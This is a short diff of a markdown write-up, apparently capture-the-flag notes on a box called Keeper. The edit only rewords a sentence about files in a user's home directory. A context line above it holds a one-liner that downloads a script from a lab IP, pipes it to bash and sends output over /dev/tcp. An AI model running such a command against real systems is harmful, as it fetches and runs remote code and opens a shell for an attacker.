Paliak/PaliaksNotes/docs/Keeper/index.md

 $ curl 10.10.14.30:8000/p | bash &> /dev/tcp/10.10.14.30/9001 &
 ```

-It seems there are quite a few interesting files in the home dir of `lnorgaard`:
+It seems there are quite a few interesting files in the home directory of `lnorgaard`:

 (Some of these were created by other people solving the box)